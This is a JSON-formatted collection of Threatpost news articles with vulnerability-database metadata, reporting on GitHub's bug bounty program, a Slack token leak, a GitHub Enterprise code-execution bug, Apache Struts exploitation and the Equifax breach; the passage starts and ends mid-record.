bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling 